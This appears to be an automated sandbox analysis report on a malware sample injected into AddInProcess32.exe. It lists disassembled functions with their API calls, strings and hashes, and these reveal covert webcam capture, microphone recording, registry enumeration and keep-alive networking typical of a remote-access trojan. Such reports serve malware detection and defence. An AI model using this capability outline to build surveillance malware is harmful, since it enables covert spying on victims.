                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                  • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                                                                  • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                  • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                                                                  Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  • Connection KeepAlive | Disabled, xrefs: 004050D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                  • String ID: Connection KeepAlive | Disabled
                                                                                  • API String ID: 2993684571-3818284553
                                                                                  • Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                                  • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                                                                  • Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                                  • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                                                                  Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                                                                  • Sleep.KERNEL32(00002710), ref: 00418DBD
                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                  • String ID: Alarm triggered
                                                                                  • API String ID: 614609389-2816303416
                                                                                  • Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                                  • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                                                                  • Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                                  • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                                                                  Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                                  • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                                                                  • Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                                  • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                                                                  Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4
                                                                                    • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologSleep
                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                  • API String ID: 3469354165-3547787478
                                                                                  • Opcode ID: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
                                                                                  • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                                                                  • Opcode Fuzzy Hash: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
                                                                                  • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                                                                  Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • _free.LIBCMT ref: 00442318
                                                                                  • _free.LIBCMT ref: 0044232F
                                                                                  • _free.LIBCMT ref: 0044234E
                                                                                  • _free.LIBCMT ref: 00442369
                                                                                  • _free.LIBCMT ref: 00442380
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3033488037-0
                                                                                  • Opcode ID: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
                                                                                  • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                                                                  • Opcode Fuzzy Hash: 1cb3f8468d83fa4b51ad4767ae85eb964ea8f2ce9cb50cf83adb64ec4114f07b
                                                                                  • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                                                                  Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                  • _free.LIBCMT ref: 004468EC
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00446AB8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                  • String ID:
                                                                                  • API String ID: 1286116820-0
                                                                                  • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                                  • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                                                                  • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                                  • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                                                                  Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                  • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                                                                  • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                  • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                                                                  Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044E391
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                                                                  • __freea.LIBCMT ref: 0044E3FD
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                  • String ID:
                                                                                  • API String ID: 313313983-0
                                                                                  • Opcode ID: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
                                                                                  • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                                                                  • Opcode Fuzzy Hash: cd44d6698c102d2af4edf97b65b02ba280a030654d2c9f96c5f73d04308e4ca0
                                                                                  • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                                                                  Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                                                                  • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                                                                  • waveInStart.WINMM ref: 00401CDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                  • String ID:
                                                                                  • API String ID: 1356121797-0
                                                                                  • Opcode ID: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                                  • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                                                                  • Opcode Fuzzy Hash: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                                  • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                                                                  Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                                                                  • _free.LIBCMT ref: 0044C59F
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  • Opcode ID: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
                                                                                  • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                                                                  • Opcode Fuzzy Hash: 4aac595f9ed8bece24bab84cc27b423baa4c6b615b6e2e749ab0ef35dcfe54a8
                                                                                  • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                                                                  Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                                  • int.LIBCPMT ref: 0040FBE8
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                  • String ID:
                                                                                  • API String ID: 2536120697-0
                                                                                  • Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                                  • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                                                                  • Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                                  • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                                                                  Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                                                                  • _free.LIBCMT ref: 004457E3
                                                                                  • _free.LIBCMT ref: 0044580A
                                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                                                                  • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                                                                  • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                                                                  • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                                                                  Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0044DBB4
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044DBC6
                                                                                  • _free.LIBCMT ref: 0044DBD8
                                                                                  • _free.LIBCMT ref: 0044DBEA
                                                                                  • _free.LIBCMT ref: 0044DBFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                  • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                                                                  • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                  • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                                                                  Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00441566
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 00441578
                                                                                  • _free.LIBCMT ref: 0044158B
                                                                                  • _free.LIBCMT ref: 0044159C
                                                                                  • _free.LIBCMT ref: 004415AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                  • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                                                                  • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                  • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                                                                  Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Enum$InfoQueryValue
                                                                                  • String ID: [regsplt]
                                                                                  • API String ID: 3554306468-4262303796
                                                                                  • Opcode ID: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                                  • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                                                                  • Opcode Fuzzy Hash: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                                  • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                                                                  Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strpbrk.LIBCMT ref: 0044B918
                                                                                  • _free.LIBCMT ref: 0044BA35
                                                                                    • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                                                    • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
                                                                                    • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2812119850-3972193922
                                                                                  • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                                  • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                                                                  • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                                  • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                                                                  Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __alloca_probe_16__freea
                                                                                  • String ID: H"G$H"GH"G
                                                                                  • API String ID: 1635606685-3036711414
                                                                                  • Opcode ID: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
                                                                                  • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                                                                  • Opcode Fuzzy Hash: e2e3cca706edb79a852b9ee6f10956c62f062633488338ea1caae12a9919ff4a
                                                                                  • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                                                                  Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                                  • ExitThread.KERNEL32 ref: 004018D6
                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                  • String ID: 8:G
                                                                                  • API String ID: 1649129571-405301104
                                                                                  • Opcode ID: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
                                                                                  • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                                                                  • Opcode Fuzzy Hash: ea0c0774d0d22f6c318a5de50af6ef7306ec5c995fc45d7a43d0569f9d0f6140
                                                                                  • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                                                                  Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00440975
                                                                                  • _free.LIBCMT ref: 00440A40
                                                                                  • _free.LIBCMT ref: 00440A4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
